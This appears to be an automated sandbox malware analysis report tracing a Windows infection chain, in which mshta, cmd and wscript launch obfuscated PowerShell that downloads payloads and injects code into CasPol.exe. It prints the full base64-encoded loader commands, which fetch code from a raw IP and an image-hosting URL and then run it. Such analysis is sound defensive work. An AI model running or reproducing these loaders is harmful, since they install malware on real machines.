                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1834189157.00000000087CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-46990
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044E92E GetProcessHeap,12_2_0044E92E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi32_6312.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi32_6312.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 63E008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE59.tmp" "c:\Users\user\AppData\Local\Temp\xduntapu\CSC441F3FFBBAD0418BBB746B4643CA251D.TMP"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblemJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jeu2ujvuzzltv0sgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbreqtdhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnqmvyzevgsu5jdelvtiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbtvwnyswf1bmjwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb3vcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagd2vibunium9qwnksdwludcagicagicagicagicagicagicagicagicagicagicagicbyvxrrsut0txdsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicboafpxcnnrcsk7jyagicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicaielrxufrrv3oiicagicagicagicagicagicagicagicagicagicagicagic1uyu1lu3bby2ugicagicagicagicagicagicagicagicagicagicagicaguk1symlotwttdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrfnli1bmc5bvdlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmjmuotuumjm1lji5lzqzos93zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzzm9ybwv0b2dldc50suyilcikzu52okfquerbvefcd2vhcmv1c2luz2dvb2rjb21wyw5pzxnmb3jnawzpdgluz2jlc3roaw5ncy52ylmildasmck7u3rhunqtu2xlzxaomyk7su52t0tllwv4ufjfc1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvx3zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzlnziuyi='+[char]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jeu2ujvuzzltv0sgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbreqtdhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnqmvyzevgsu5jdelvtiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbtvwnyswf1bmjwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb3vcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagd2vibunium9qwnksdwludcagicagicagicagicagicagicagicagicagicagicagicbyvxrrsut0txdsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicboafpxcnnrcsk7jyagicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicaielrxufrrv3oiicagicagicagicagicagicagicagicagicagicagicagic1uyu1lu3bby2ugicagicagicagicagicagicagicagicagicagicagicaguk1symlotwttdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrfnli1bmc5bvdlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmjmuotuumjm1lji5lzqzos93zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzzm9ybwv0b2dldc50suyilcikzu52okfquerbvefcd2vhcmv1c2luz2dvb2rjb21wyw5pzxnmb3jnawzpdgluz2jlc3roaw5ncy52ylmildasmck7u3rhunqtu2xlzxaomyk7su52t0tllwv4ufjfc1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvx3zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzlnziuyi='+[char]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $antimagistrical = 'jgvmzm9ydgxlc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzsky2fyzglnyw5zid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskc3boywnlbglhid0gjgnhcmrpz2fucy5eb3dubg9hzerhdgeojgvmzm9ydgxlc3mpoyrjb3ntzwegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkc3boywnlbglhktskzg9vbxnhewvycya9icc8pejbu0u2nf9tvefsvd4+jzskcmvzdgfnbmf0aw9uid0gjzw8qkftrty0x0vord4+jzsks2fzahviawfuid0gjgnvc21lys5jbmrlee9mkcrkb29tc2f5zxjzktskxznjb25vbxvzid0gjgnvc21lys5jbmrlee9mkcryzxn0ywduyxrpb24poyrlyxnodwjpyw4glwdlidaglwfuzcakxznjb25vbxvzic1ndcaks2fzahviawfuoyrlyxnodwjpyw4gkz0gjgrvb21zyxllcnmutgvuz3rooyrvdmvybw9kdwxhdgvkid0gjmwty29ub211cyaticrlyxnodwjpyw47jhjlznjpz2vyyxrvcnkgpsaky29zbwvhlln1ynn0cmluzygks2fzahviawfulcakb3zlcm1vzhvsyxrlzck7jhvuyw5jag9yzwqgpsatam9pbiaojhjlznjpz2vyyxrvcnkuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhjlznjpz2vyyxrvcnkutgvuz3rokv07jhnwaxjpbgx1bxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcr1bmfuy2hvcmvkktskehlsb2xpdgugpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrzcglyawxsdw1zktskcghvc3boyxrpemvzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhbob3nwagf0axplcy5jbnzva2uojg51bgwsieaojzavd21ndegvci9lzs5ldhnhcc8vonnwdhrojywgjyrjzwrhcnmnlcanjgnlzgfycycsiccky2vkyxjzjywgj0nhc1bvbccsiccky2vkyxjzjywgjyrjzwrhcnmnlccky2vkyxjzjywnjgnlzgfycycsjyrjzwrhcnmnlccky2vkyxjzjywnjgnlzgfycycsjzenlccky2vkyxjzjywnjykpow==';$periblem = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($antimagistrical));invoke-expression $periblem
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jeu2ujvuzzltv0sgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbreqtdhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnqmvyzevgsu5jdelvtiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbtvwnyswf1bmjwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb3vcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagd2vibunium9qwnksdwludcagicagicagicagicagicagicagicagicagicagicagicbyvxrrsut0txdsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicboafpxcnnrcsk7jyagicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicaielrxufrrv3oiicagicagicagicagicagicagicagicagicagicagicagic1uyu1lu3bby2ugicagicagicagicagicagicagicagicagicagicagicaguk1symlotwttdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrfnli1bmc5bvdlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmjmuotuumjm1lji5lzqzos93zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzzm9ybwv0b2dldc50suyilcikzu52okfquerbvefcd2vhcmv1c2luz2dvb2rjb21wyw5pzxnmb3jnawzpdgluz2jlc3roaw5ncy52ylmildasmck7u3rhunqtu2xlzxaomyk7su52t0tllwv4ufjfc1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvx3zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzlnziuyi='+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jeu2ujvuzzltv0sgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbreqtdhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnqmvyzevgsu5jdelvtiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbw9uiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbtvwnyswf1bmjwlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb3vcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagd2vibunium9qwnksdwludcagicagicagicagicagicagicagicagicagicagicagicbyvxrrsut0txdsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicboafpxcnnrcsk7jyagicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicaielrxufrrv3oiicagicagicagicagicagicagicagicagicagicagicagic1uyu1lu3bby2ugicagicagicagicagicagicagicagicagicagicagicaguk1symlotwttdcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrfnli1bmc5bvdlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmjmuotuumjm1lji5lzqzos93zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzzm9ybwv0b2dldc50suyilcikzu52okfquerbvefcd2vhcmv1c2luz2dvb2rjb21wyw5pzxnmb3jnawzpdgluz2jlc3roaw5ncy52ylmildasmck7u3rhunqtu2xlzxaomyk7su52t0tllwv4ufjfc1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvx3zwfyzxvzaw5nz29vzgnvbxbhbmllc2zvcmdpzml0aw5nymvzdghpbmdzlnziuyi='+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $antimagistrical = 'jgvmzm9ydgxlc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzsky2fyzglnyw5zid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskc3boywnlbglhid0gjgnhcmrpz2fucy5eb3dubg9hzerhdgeojgvmzm9ydgxlc3mpoyrjb3ntzwegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkc3boywnlbglhktskzg9vbxnhewvycya9icc8pejbu0u2nf9tvefsvd4+jzskcmvzdgfnbmf0aw9uid0gjzw8qkftrty0x0vord4+jzsks2fzahviawfuid0gjgnvc21lys5jbmrlee9mkcrkb29tc2f5zxjzktskxznjb25vbxvzid0gjgnvc21lys5jbmrlee9mkcryzxn0ywduyxrpb24poyrlyxnodwjpyw4glwdlidaglwfuzcakxznjb25vbxvzic1ndcaks2fzahviawfuoyrlyxnodwjpyw4gkz0gjgrvb21zyxllcnmutgvuz3rooyrvdmvybw9kdwxhdgvkid0gjmwty29ub211cyaticrlyxnodwjpyw47jhjlznjpz2vyyxrvcnkgpsaky29zbwvhlln1ynn0cmluzygks2fzahviawfulcakb3zlcm1vzhvsyxrlzck7jhvuyw5jag9yzwqgpsatam9pbiaojhjlznjpz2vyyxrvcnkuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhjlznjpz2vyyxrvcnkutgvuz3rokv07jhnwaxjpbgx1bxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcr1bmfuy2hvcmvkktskehlsb2xpdgugpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrzcglyawxsdw1zktskcghvc3boyxr